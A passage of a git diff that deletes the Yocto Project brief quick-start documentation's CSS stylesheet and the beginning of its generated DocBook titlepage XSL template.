-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/bypqs-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title {
-  background-position: bottom;
-  background-repeat: repeat-x;
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl
deleted file mode 100644
index a435ac77ab..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl
+++ /dev/null
@@ -1,3820 +0,0 @@
-<?xml version="1.0"?>
-
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" version="1.0" exclude-result-prefixes="exsl">
-
-<!-- This stylesheet was created by template/titlepage.xsl-->
-
-<xsl:template name="article.titlepage.recto">
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/abstract"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/abstract"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/abstract"/>
-  <xsl:choose>
-    <xsl:when test="articleinfo/title">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/title"/>
-    </xsl:when>
-    <xsl:when test="artheader/title">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="articleinfo/subtitle">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="artheader/subtitle">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/corpauthor"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/corpauthor"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/authorgroup"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/authorgroup"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/author"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/author"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/othercredit"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/othercredit"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/releaseinfo"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/releaseinfo"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/copyright"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/copyright"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/legalnotice"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/legalnotice"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/pubdate"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/pubdate"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revision"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revision"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revhistory"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revhistory"/>
-  <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revhistory"/>
-</xsl:template>
-
-<xsl:template name="article.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="article.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="article.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="article.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="article.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="article.titlepage.before.recto"/>
-      <xsl:call-template name="article.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="article.titlepage.before.verso"/>
-      <xsl:call-template name="article.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="article.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="article.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="article.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="abstract" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-  <xsl:call-template name="anchor"/>
-  <xsl:apply-templates/>
-<!-- orignally generated content -->
-<!-- <xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -->
-</div>
-</xsl:template>
-
-<xsl:template match="title" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="set.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="setinfo/title">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="setinfo/subtitle">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/corpauthor"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/authorgroup"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/author"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/othercredit"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/releaseinfo"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/copyright"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/legalnotice"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/pubdate"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revision"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revhistory"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/abstract"/>
-  <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="set.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="set.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="set.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="set.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="set.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="set.titlepage.before.recto"/>
-      <xsl:call-template name="set.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="set.titlepage.before.verso"/>
-      <xsl:call-template name="set.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="set.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="set.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="set.titlepage.verso.mode">
